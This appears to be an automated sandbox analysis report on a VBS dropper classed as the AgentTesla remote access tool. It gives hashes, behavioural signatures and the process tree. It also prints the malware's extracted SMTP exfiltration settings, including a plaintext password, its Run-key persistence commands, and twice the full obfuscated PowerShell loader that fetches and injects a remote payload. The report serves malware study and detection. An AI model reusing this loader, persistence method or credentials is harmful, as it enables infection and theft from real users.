Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
19-06-2024 14:56
Static task
static1
Behavioral task
behavioral1
Sample
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
Resource
win10v2004-20240226-en
General
-
Target
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
-
Size
91KB
-
MD5
44d9ad2f0db6d4cb899d6657974c817b
-
SHA1
1a76e0f99bffc9a92c8578f87538f2efb2b94ec9
-
SHA256
09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
-
SHA512
09b6a077beed527f4756d9d20f696a66976537e1fcef947fa29ac8e8f9c761be83297a07920e050f4df1ca16d41b11b51298d9d72f45ad352e5166fd95a68c8b
-
SSDEEP
1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5XRyz29KWFj:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMZ
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.myhydropowered.com - Port:
587 - Username:
[email protected] - Password:
n8h0yvDxAKrtxKB - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 3 916 powershell.exe 5 916 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exewab.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org 13 api.ipify.org 14 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid Process 2784 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid Process 1700 powershell.exe 2784 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 1700 set thread context of 2784 1700 powershell.exe 34 -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid Process 916 powershell.exe 1700 powershell.exe 1700 powershell.exe 2784 wab.exe 2784 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 1700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid Process Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2784 wab.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid Process procid_target PID 948 wrote to memory of 916 948 WScript.exe 28 PID 948 wrote to memory of 916 948 WScript.exe 28 PID 948 wrote to memory of 916 948 WScript.exe 28 PID 916 wrote to memory of 2020 916 powershell.exe 30 PID 916 wrote to memory of 2020 916 powershell.exe 30 PID 916 wrote to memory of 2020 916 powershell.exe 30 PID 916 wrote to memory of 1700 916 powershell.exe 32 PID 916 wrote to memory of 1700 916 powershell.exe 32 PID 916 wrote to memory of 1700 916 powershell.exe 32 PID 916 wrote to memory of 1700 916 powershell.exe 32 PID 1700 wrote to memory of 2152 1700 powershell.exe 33 PID 1700 wrote to memory of 2152 1700 powershell.exe 33 PID 1700 wrote to memory of 2152 1700 powershell.exe 33 PID 1700 wrote to memory of 2152 1700 powershell.exe 33 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 1700 wrote to memory of 2784 1700 powershell.exe 34 PID 2784 wrote to memory of 2832 2784 wab.exe 35 PID 2784 wrote to memory of 2832 2784 wab.exe 35 PID 2784 wrote to memory of 2832 2784 wab.exe 35 PID 2784 wrote to memory of 2832 2784 wab.exe 35 PID 2832 wrote to memory of 2652 2832 cmd.exe 37 PID 2832 wrote to memory of 2652 2832 cmd.exe 37 PID 2832 wrote to memory of 2652 2832 cmd.exe 37 PID 2832 wrote to memory of 2652 2832 cmd.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"3⤵PID:2020
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"4⤵PID:2152
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
